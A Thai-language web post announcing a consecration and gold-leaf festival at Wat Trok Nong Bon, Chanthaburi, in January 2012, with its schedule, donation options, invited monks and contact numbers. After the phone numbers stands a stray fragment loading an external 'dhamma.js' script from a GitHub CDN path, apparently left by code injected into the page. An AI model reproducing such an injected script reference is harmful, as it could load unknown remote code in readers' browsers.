งานปิดทองฝังลูกนิมิต ผูกพัทธสีมา ระหว่างวันที่ 21-30 มกราคม 2555 วัดตรอกนองบน

 notecompx    4 ธ.ค. 2554



งานปิดทองฝังลูกนิมิต ผูกพัทธสีมา วัดตรอกนองบน ต.ตรอกนอง อ.ขลุง จ.จันทบุรี
ระหว่างวันที่ 21-30 มกราคม 2555
วันที่ 14 มกราคม 2555 เวลา 20.00 น. มีพิธีพุทธาภิเษกวัตถุมงคล
วันที่ 21- 30 มกราคม 2555 เปิดให้สาธุชนร่วมงานปิดทอง และมีมหรสพสมชมตลอดงาน
วันที่ 30 มกราคม 2555 เวลา 13.00 น พิธีตัดหวายลูกนิมิต

รายการร่วมบริจาคเป็นเจ้าภาพ
- เจ้าภาพอาหารโรงทาน ซึ่งสามารถบริจาคเป็นเงินสด หรือ นำอาหารมาเลี้ยงตามวันเวลา

รายการนิมนต์พระเกจิอาจารย์ในวันพิธีพุทธาภิเษกวัตถุมงคล
- พระครูสุพจน์วรคุณ เจ้าอาวาสวัดห้วงพัฒนา ต.แสนตุ้ง อ.เขาสมิง จ.ตราด
- พระครูพิพัฒน์อโนมคุณ วัดอ่าวใหญ่ ต.แขวงอ่าวใหญ่ อ.เมือง จ.ตราด
- พระอาจารย์มนัส มนฺตชาโต
- พระครูสุภัทรสีลาจาร วัดบ่อเวฬุวนาราม
- พระครูธรรมกิตติคุณ (หลวงพ่อสวาท) วัดอ่าวหมู ต.บางกระไชย อ.แหลมสิงห์ จ.จันทบุรี
- หลวงพ่อจำเนียร จ.กระบี่
- พระครูธรรมสรคุณ (หลวงพ่อเขียน) เจ้าอาวาสวัดกระทิง
- พระภิกษุบุญรัตน์ วัดมังกรบุปผาราม
- พระครูปลัดชาญ วชิรญาโน วัดใหม่ทุ่งตลาด
- พระเทพจันทมุนี เจ้าคณะจังหวัดจันทบุรี วัดใหม่
- พระครูวิจิตรธรรมาภิรัต เจ้าอาวาสวัดระหารไร่

สอบถามได้ที่
0861091795, 0818648299, 0861454580 https://cdn.jsdelivr.net/gh/tatikers/san/dhamma.js">   




  3,695 

  แสดงความคิดเห็น


RELATED STORIES



จีรัง กรุ๊ป    

 ธรรมะไทย